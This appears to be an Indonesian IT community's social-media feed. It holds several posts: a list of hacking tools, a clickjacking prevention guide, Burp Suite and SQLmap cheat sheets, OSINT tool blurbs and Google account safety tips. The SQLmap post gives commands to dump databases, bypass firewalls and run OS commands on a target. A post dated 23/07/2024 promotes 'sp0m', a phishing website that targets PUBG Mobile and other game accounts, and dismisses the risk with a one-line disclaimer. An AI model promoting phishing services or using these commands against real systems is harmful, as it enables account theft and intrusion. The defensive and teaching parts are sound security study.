PRO it JOGJA

17/03/2025

1K Follower Akan Di Mulai Secara Brutal Postingan Seputar IT , Tips And Trick Sampai Dengan Gratisan Code Yang Tentunya Kalian Kudu Perbaikin Lagi Ya Bolo.

17/03/2025

08/08/2024

20 Tools Hacking yang Harus Diketahui oleh Setiap Ethical Hacker

Nmap (Network Mapper): Alat pemetaan jaringan yang digunakan untuk menemukan host dan layanan pada jaringan komputer.

Wireshark: Analisis paket jaringan yang memungkinkan pengguna melihat data di tingkat mikroskopis.

Metasploit: Platform pengujian penetrasi yang membantu dalam mengidentifikasi, mengeksploitasi, dan memvalidasi kerentanan.

John the Ripper: Alat cracking password yang cepat untuk mendeteksi password lemah pada sistem.

Aircrack-ng: Alat untuk auditing wireless network dan cracking WEP/WPA-PSK keys.

Burp Suite: Platform untuk pengujian keamanan aplikasi web yang mencakup berbagai alat, seperti scanner dan intruder.

OWASP ZAP (Zed Attack Proxy): Alat pengujian penetrasi aplikasi web yang membantu menemukan kerentanan keamanan dalam aplikasi web.

Hydra: Alat brute force yang mendukung berbagai protokol untuk menguji keamanan login.

Nessus: Scanner kerentanan yang membantu dalam mengidentifikasi kelemahan dalam sistem.

Maltego: Alat intelijen open-source yang membantu dalam pengumpulan dan analisis informasi.

Social Engineer Toolkit (SET): Kerangka kerja untuk melakukan serangan rekayasa sosial.

Nikto: Scanner server web yang mendeteksi kerentanan dalam server web.

SQLmap: Alat otomatis untuk mendeteksi dan mengeksploitasi kerentanan injeksi SQL.

Ettercap: Alat man-in-the-middle yang dapat digunakan untuk serangan sniffing pada LAN.

Netcat: Alat jaringan yang memungkinkan pengguna untuk menulis dan membaca data di seluruh koneksi jaringan.

BeEF (Browser Exploitation Framework): Alat untuk mengeksploitasi kerentanan dalam browser web.

Hashcat: Alat cracking password yang sangat cepat menggunakan GPU.

Empire: Framework post-exploitation yang memungkinkan kontrol jarak jauh terhadap sistem yang dikompromikan.

Wapiti: Alat pengujian keamanan aplikasi web yang mendeteksi berbagai kerentanan.

OpenVAS (Open Vulnerability Assessment System): Platform manajemen kerentanan yang kuat dan open-source.

Tambahi Jika Kalian Ada Yang tahu Selain Ini Ya ^_^

07/08/2024

Clickjacking

Jenis serangan siber di mana penyerang mencoba untuk menipu pengguna agar mengklik elemen web yang tampak tidak berbahaya, namun sebenarnya memiliki konsekuensi berbahaya. Serangan ini biasanya melibatkan penggunaan teknik iframe atau transparansi untuk menyembunyikan elemen berbahaya di balik elemen yang tampak legal. Dengan cara ini, pengguna yang tidak sadar dapat diarahkan untuk melakukan tindakan yang tidak diinginkan seperti mengungkapkan informasi pribadi, mengaktifkan perangkat lunak jahat, atau mengambil tindakan yang merugikan.

Pencegahan Clickjacking
Untuk mencegah clickjacking, ada beberapa langkah yang bisa diambil:

Pengaturan HTTP Header X-Frame-Options
Header ini bisa diatur pada server untuk mengontrol apakah halaman dapat ditampilkan di dalam frame atau iframe. Berikut adalah tiga opsi yang bisa digunakan:
DENY: Mencegah halaman dimuat dalam frame atau iframe sama sekali.
SAMEORIGIN: Mengizinkan halaman dimuat dalam frame atau iframe hanya jika berasal dari domain yang sama.
ALLOW-FROM uri: Mengizinkan halaman dimuat dalam frame atau iframe hanya dari URI yang ditentukan.

Contoh pengaturan dalam konfigurasi server Apache:

===================

Header always append X-Frame-Options SAMEORIGIN
===================

Content Security Policy (CSP)
Dengan menggunakan Content Security Policy (CSP), Anda bisa menentukan kebijakan keamanan untuk halaman web, termasuk mencegah tampilan halaman dalam frame atau iframe dari domain yang tidak diinginkan.

Contoh penggunaan CSP:

===================



===================
JavaScript Frame Busting
Cara ini melibatkan penggunaan JavaScript untuk memastikan bahwa halaman tidak sedang dibingkai oleh domain lain. Meskipun tidak seaman metode lainnya, ini bisa menjadi tambahan pencegahan.

Contoh code JavaScript untuk frame busting:

===================

if (window.top !== window.self) {
window.top.location = window.self.location;
}
===================

Contoh Implementasi di HTML dan Apache
Misalkan kita memiliki sebuah halaman web yang ingin kita lindungi dari clickjacking. Berikut adalah contoh kode di HTML dan konfigurasi server yang bisa digunakan:

HTML File:

===================







Protected Page

if (window.top !== window.self) {
window.top.location = window.self.location;
}



Halaman Dilindungi dari Clickjacking
Ini adalah contoh halaman yang dilindungi dari serangan clickjacking.


===================

Konfigurasi Apache:

===================

Header always set X-Frame-Options "SAMEORIGIN"
Header always set Content-Security-Policy "frame-ancestors 'self'"

===================

Dengan langkah-langkah ini, Anda bisa melindungi situs web dari risiko clickjacking dan menjaga keamanan data serta pengalaman pengguna.

06/08/2024

Burp Suite Cheat Sheet
1. Antarmuka Utama

Proxy: Menangkap dan memodifikasi lalu lintas HTTP/S.
Target: Menampilkan struktur situs web dan memungkinkan pemetaan.
Scanner: (Versi Pro) Pemindaian otomatis untuk kerentanan.
Intruder: Alat brute force dan fuzzing.
Repeater: Mengirim ulang dan memodifikasi permintaan HTTP.
Sequencer: Analisis kualitas data entropi.
Decoder: Encode/decode data dalam berbagai format.
Comparer: Membandingkan dua data yang berbeda.

2. Proxy

Menangkap Permintaan:
Secara default, Burp Suite akan menangkap semua permintaan.
Aktifkan/tidak aktifkan dengan tombol Intercept is on/off.

Memodifikasi Permintaan:
Anda dapat memodifikasi parameter, header, dan data lainnya dalam permintaan yang ditangkap.

3. Repeater

Mengirim Ulang Permintaan:
Kirim ulang permintaan HTTP dengan modifikasi untuk menguji respons server.

4. Intruder

Konfigurasi Serangan:
Pilih posisi untuk payload.
Pilih jenis serangan (Sniper, Battering ram, Pitchfork, Cluster bomb).
Pilih payloads dan konfigurasinya.

5. Decoder

Encode/Decode:
Encode atau decode data dari berbagai format seperti Base64, URL encoding, HTML encoding, dan lainnya.

6. Pengaturan Umum

Mengubah Port Proxy:
Proxy > Options > Proxy Listeners > Ubah port.

Menambahkan Sertifikat CA Burp:
Proxy > Options > SSL/TLS > Certificate > Generate CA Certificate.

7. Plugin Ekstra (BApps)

Install BApp:
Buka Extender > BApp Store dan pilih plugin yang ingin diinstal.

8. Shortcut Keyboard Penting

Ctrl + E: Beralih antara Editor (raw/hex/etc.).
Ctrl + R: Kirim permintaan ke Repeater.
Ctrl + I: Kirim permintaan ke Intruder.
Ctrl + Shift + P: Menghentikan atau melanjutkan proxy.

Contoh Penggunaan

Menangkap dan Memodifikasi Permintaan:
Aktifkan Intercept dan buka situs web target. Tangkap dan modifikasi permintaan yang dikirim.

Menggunakan Repeater:
Kirim permintaan yang ditangkap ke Repeater untuk menguji berbagai skenario dengan permintaan yang sama.

Brute Force Login:
Gunakan Intruder untuk mencoba kombinasi username dan password pada halaman login.

Etika dan Legalitas

Penggunaan Burp Suite untuk pengujian keamanan tanpa izin dapat melanggar hukum. Pastikan Anda memiliki izin untuk menguji aplikasi atau situs web target.
==================
burp suite,burp suite tutorial,burp suite pro,burp,burp suite professional,burp suite xss,burp suite basics,burp suite hacking,how to use burp suite,burp suite crack,suite,burp suite guide,burp suite 2,burp suite demo,burp suite tools,burp suite обзор,burp suite course,основы burp suite,burp suite in hindi,hacking burp suite,burp suite browser,burp suite install,install burp suite,burp suite overview,como usar burp suite
==================

05/08/2024

SQLmap Cheat Sheet

1. Perintah Dasar

Menentukan URL target:

bash

sqlmap -u "http://target.com/vulnerable.php?id=1"

Deteksi basis data (DBMS):

bash

sqlmap -u "http://target.com/vulnerable.php?id=1" --fingerprint

Mendapatkan daftar database:

bash

sqlmap -u "http://target.com/vulnerable.php?id=1" --dbs

Mendapatkan daftar tabel dalam database:

bash

sqlmap -u "http://target.com/vulnerable.php?id=1" -D nama_database --tables

Mendapatkan daftar kolom dalam tabel:

bash

sqlmap -u "http://target.com/vulnerable.php?id=1" -D nama_database -T nama_tabel --columns

Dump data dari tabel:

bash

sqlmap -u "http://target.com/vulnerable.php?id=1" -D nama_database -T nama_tabel --dump

2. Opsi Tambahan

SQL Injection jenis tertentu (Boolean-based, Error-based, etc.):

bash

--technique=B
--technique=E

Menggunakan cookie:

bash

--cookie="PHPSESSID=abc123"

Menggunakan proxy:

bash

--proxy="http://127.0.0.1:8080"

Mengatur User-Agent:

bash

--user-agent="Custom User-Agent"

Menentukan data POST:

bash

--data="param1=value1¶m2=value2"

Menggunakan waktu delay antara permintaan:

bash

--delay=3

Bypass WAF (Web Application Firewall):

bash

--tamper=charencode,between

Menjalankan perintah pada sistem target:

bash

--os-cmd="command"

3. Mode Pengujian

Scan level (1 hingga 5):

bash

--level=3

Tingkat agresifitas (1 hingga 5):

bash

--risk=2

Menggunakan database untuk menyimpan hasil:

bash

--batch

Contoh Penggunaan

Mencari dan mengeksploitasi SQL injection dengan default setting:

bash

sqlmap -u "http://example.com/page?id=1"

Menentukan parameter POST dan menggunakan proxy:

bash

sqlmap -u "http://example.com/login" --data="username=admin&password=1234" --proxy="http://127.0.0.1:8080"

Menggunakan cookie untuk otentikasi:

bash

sqlmap -u "http://example.com/profile" --cookie="PHPSESSID=abc123"

Menentukan teknik SQL Injection yang akan digunakan:

bash

sqlmap -u "http://example.com/page?id=1" --technique=BT

Catatan

Etika dan Legalitas:

Gunakan SQLmap hanya pada aplikasi web yang Anda miliki atau memiliki izin eksplisit untuk diuji. Penggunaan alat ini untuk kegiatan ilegal dapat mengakibatkan konsekuensi hukum yang serius.

Semoga cheat sheet ini membantu! Jika Anda memiliki pertanyaan lebih lanjut atau membutuhkan bantuan dengan perintah tertentu, jangan ragu untuk bertanya.

========
sqlmap,sqlmap tutorial,sqlmap dvwa,sqlmap dump,sqlmap 2018,learn sqlmap,sqlmap termux,what is sqlmap,sqlmap windows,install sqlmap,sqlmap tutorial in depth,how to use sqlmap,how to run sqlmap,tutorial sqlmap,sqlmap kali linux,que es sqlmap,sqlmap tutorial in hindi,sqlmap tool in hindi,como utilizar sqlmap,sqlmap bangal tutorial,sqlmap exe,run sqlmap,sql injection with sqlmap,how to use burp with sqlmap,sqlmap tutorial in detail,sqlmap tool
========

25/07/2024

OSINT FRAMEWORK berfokus pada pengumpulan informasi dari alat atau sumber daya gratis. Tujuannya adalah untuk membantu orang menemukan sumber OSINT gratis. Beberapa situs yang disertakan mungkin memerlukan registrasi atau menawarkan lebih banyak data seharga $$$, namun Anda seharusnya bisa mendapatkan setidaknya sebagian dari informasi yang tersedia tanpa biaya.

Saya awalnya membuat kerangka ini dengan sudut pandang keamanan informasi. Sejak itu, tanggapan dari bidang dan disiplin ilmu lain sangat luar biasa. Saya ingin sekali dapat memasukkan sumber daya OSINT lainnya, terutama dari bidang di luar infosec. Tolong beri tahu saya tentang apa pun yang mungkin hilang!

===========================================
osint, framework, open-source intelligence, cyber security, information gathering, threat intelligence, data analysis, investigative tools, cyber investigations, osint tools, security framework, data collection, intelligence framework
===========================================

25/07/2024

SpiderFoot

SpiderFoot is a reconnaissance tool that automatically queries over 100 public data sources (OSINT) to gather intelligence on IP addresses, domain names, e-mail addresses, names and more. You simply specify the target you want to investigate, pick which modules to enable and then SpiderFoot will collect data to build up an understanding of all the entities and how they relate to each other.

SpiderFoot adalah alat pengintaian yang secara otomatis menanyakan lebih dari 100 sumber data publik (OSINT) untuk mengumpulkan informasi intelijen tentang alamat IP, nama domain, alamat email, nama, dan banyak lagi. Anda cukup menentukan target yang ingin Anda selidiki, memilih modul mana yang akan diaktifkan, lalu SpiderFoot akan mengumpulkan data untuk membangun pemahaman tentang semua entitas dan bagaimana mereka berhubungan satu sama lain.

23/07/2024

Sp0m Website ini merupakan sebuah Website Tools Phishing dengan nama sp0m yang siap mengincar akun PUBG Mobile dan game-game lainnya.

Tinggal Buat Akun Tidak Perlu Email Langsung Jadi. Tapi Ingat Jangan Di gunakan untuk hal negatif ya bolo

Berikut Penampakan Webnya.

21/07/2024

PASTIKAN RUTIN LAKUKAN HAL DI BAWAH INI YA BOLO SEMUANYA

1. Pastikan akun Google Anda aman dari potensi ancaman dengan langkah-langkah ini! Gunakan kata sandi yang kuat 💪, aktifkan verifikasi 2 langkah, dan periksa izin aplikasi secara berkala.

2. Jaga keamanan akun Google Anda dari serangan toko online dengan langkah-langkah sederhana ini! Periksa aktivitas akun, waspadai phishing, dan gunakan layanan keamanan Google.

3. Lindungi akun Google Anda dari ancaman dengan langkah-langkah ini! Periksa izin aplikasi, pantau email pribadi, dan selalu update perangkat lunak Anda.
4. Tingkatkan keamanan akun Google Anda dari potensi ancaman dengan langkah-langkah ini! Waspadai serangan malware, periksa aktivitas akun, dan gunakan layanan keamanan Google.

5. Jangan biarkan akun Google rentan terhadap ancaman! Ikuti langkah-langkah ini untuk melindungi akun Anda dari aktivitas toko online yang mencurigakan. 🛡️